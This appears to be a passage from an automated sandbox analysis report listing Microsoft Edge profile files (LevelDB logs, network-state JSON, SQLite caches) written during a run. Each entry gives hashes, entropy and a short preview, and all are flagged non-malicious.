Preview:	SNSS........}".............}".......".}".............}".........}".........}".........}".....!...}".................................}"..}".1..,....}".$...12d47a5a_59ef_4e12_89ad_afe0d1372099....}".........}".......+.........}".....}".........................}".....................5..0....}".&...{98952893-68FF-4A5D-A164-705C709ED3DB}......}".........}"............................}".............}".........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x..........&.....&.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.151555077547462
Encrypted:	false
SSDEEP:	6:H2mR1SQL+q2P923oH+Tcwt7Uh2ghZIFUt8Y2mR1SGKWZmw+Y2mRFQLVkwO923oHT:93+v4YebIhHh2FUt821KW/+JV5LYebIT
MD5:	1906839E8E9ADEE2F6B250731BB0F654
SHA1:	FB5667F9351957C690B3925AC5F11DE2A4022144
SHA-256:	5776FF30168D6BA346758D022BCCBAAEEF7A2CC8620A355641A8009BD3168AC8
SHA-512:	A7A11614FA082FE9FDB69D925AFA86219B2021D4F30E3CD5EACB618E454ECB5F0266CA64A5DAEC344BC05C967E1055DBB37D4AA4401FFFAC9FB6031FC775FFB0
Malicious:	false
Preview:	2024/11/09-22:55:13.646 1cec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/09-22:55:13.646 1cec Recovering log #3.2024/11/09-22:55:13.647 1cec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	352
Entropy (8bit):	5.151555077547462
Encrypted:	false
SSDEEP:	6:H2mR1SQL+q2P923oH+Tcwt7Uh2ghZIFUt8Y2mR1SGKWZmw+Y2mRFQLVkwO923oHT:93+v4YebIhHh2FUt821KW/+JV5LYebIT
MD5:	1906839E8E9ADEE2F6B250731BB0F654
SHA1:	FB5667F9351957C690B3925AC5F11DE2A4022144
SHA-256:	5776FF30168D6BA346758D022BCCBAAEEF7A2CC8620A355641A8009BD3168AC8
SHA-512:	A7A11614FA082FE9FDB69D925AFA86219B2021D4F30E3CD5EACB618E454ECB5F0266CA64A5DAEC344BC05C967E1055DBB37D4AA4401FFFAC9FB6031FC775FFB0
Malicious:	false
Preview:	2024/11/09-22:55:13.646 1cec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/09-22:55:13.646 1cec Recovering log #3.2024/11/09-22:55:13.647 1cec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.222458366319314
Encrypted:	false
SSDEEP:	6:H25Iq2P923oH+TcwtzjqEKj3K/2jMGIFUt8Y2ZAhZmw+Y2KzkwO923oH+Tcwtzjk:vv4YebvqBQFUt8k/+Ez5LYebvqBvJ
MD5:	FF584C3CC0DE079973C1C5222A3D28B3
SHA1:	0CF92FD05DA481ABD48AA8EDEF436F2C16A0EC84
SHA-256:	D94ACD830042502BFEC64489002F3C802E0405B2BC5C2E42F326837C1A743527
SHA-512:	BE36ED836A9D609C3C4DC4060627F10425FC3461754B01B759536D1345E512ED0DB75416110CA6E0262A26EECB62E5BB4B9E598EA8E59129232F8148BB20D89F
Malicious:	false
Preview:	2024/11/09-22:55:14.777 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/09-22:55:14.778 1ee0 Recovering log #3.2024/11/09-22:55:14.792 1ee0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.222458366319314
Encrypted:	false
SSDEEP:	6:H25Iq2P923oH+TcwtzjqEKj3K/2jMGIFUt8Y2ZAhZmw+Y2KzkwO923oH+Tcwtzjk:vv4YebvqBQFUt8k/+Ez5LYebvqBvJ
MD5:	FF584C3CC0DE079973C1C5222A3D28B3
SHA1:	0CF92FD05DA481ABD48AA8EDEF436F2C16A0EC84
SHA-256:	D94ACD830042502BFEC64489002F3C802E0405B2BC5C2E42F326837C1A743527
SHA-512:	BE36ED836A9D609C3C4DC4060627F10425FC3461754B01B759536D1345E512ED0DB75416110CA6E0262A26EECB62E5BB4B9E598EA8E59129232F8148BB20D89F
Malicious:	false
Preview:	2024/11/09-22:55:14.777 1ee0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/09-22:55:14.778 1ee0 Recovering log #3.2024/11/09-22:55:14.792 1ee0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\05bb2a89-4e09-4be0-b096-3099d451e371.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\23ba958f-3063-40f9-80a4-1a0c19b1652a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\3b585ac8-a808-498b-9a80-4f8d3ee8e5b8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\48a8578b-4d54-41ad-8084-a86f6e34f825.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\653146e4-676c-4fb3-bdc4-be942f845a57.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
MD5:	ABE81C38891A875B52127ACE9C314105
SHA1:	8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
SHA-256:	6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
SHA-512:	B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF5093e.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38185.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF38473.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF47480.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries~RF49c9a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b82d3a35-edf1-4eb9-9e45-e9930dfe20f5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\e7b3354e-ca29-42e2-bcd3-7d9da70d3a9d.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\f718a99a-ad30-45bc-909a-1902a882f06e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	4.842082263530856
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiBn1KKyRY:YHpoeS7PMVKJTnMRK3B1KF+
MD5:	F32592F4926E25E0D647EA7E4CBCD3FE
SHA1:	4126DAA71810BDC438563699F77D5DA66DD3295E
SHA-256:	BB0A228D78AE9A4E3508B13B041710AAA7E658AAA526FA553719851EB4F2303A
SHA-512:	96F9B027B0E7E44E14006EAC6DE05A6CF684F5D6427004737CC379DC02875FA1D65C422AB6CA0EF89C0555ACD12B1D99F552894F15EE9EAF1A203FE58835A35D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.2528006005608825
Encrypted:	false
SSDEEP:	12:M3uii+v4YebvqBZFUt8vs/+vkm3V5LYebvqBaJ:MeiT4Yebvyg8vBkmXLYebvL
MD5:	4F6404FE5BE34A2A97081AAC47DDE63B
SHA1:	B11586BAFABD3D513D1DC82D7C4AF2D4890AB918
SHA-256:	591F9974657DAD897C818189305E9890A30E6085BD7F92B23ACB9FB7190AB238
SHA-512:	70CA7224B5915C31358A77CFCCAE66965D8EFA024C46DED69710EAE21E298A8DE9F143DB89D0DEDB7911AB91F483718E1A2714ABC47AA39A6EC78A08B87F32CB
Malicious:	false
Preview:	2024/11/09-22:55:32.684 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/09-22:55:32.686 1ebc Recovering log #3.2024/11/09-22:55:32.689 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	422
Entropy (8bit):	5.2528006005608825
Encrypted:	false
SSDEEP:	12:M3uii+v4YebvqBZFUt8vs/+vkm3V5LYebvqBaJ:MeiT4Yebvyg8vBkmXLYebvL
MD5:	4F6404FE5BE34A2A97081AAC47DDE63B
SHA1:	B11586BAFABD3D513D1DC82D7C4AF2D4890AB918
SHA-256:	591F9974657DAD897C818189305E9890A30E6085BD7F92B23ACB9FB7190AB238
SHA-512:	70CA7224B5915C31358A77CFCCAE66965D8EFA024C46DED69710EAE21E298A8DE9F143DB89D0DEDB7911AB91F483718E1A2714ABC47AA39A6EC78A08B87F32CB
Malicious:	false
Preview:	2024/11/09-22:55:32.684 1ebc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/11/09-22:55:32.686 1ebc Recovering log #3.2024/11/09-22:55:32.689 1ebc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
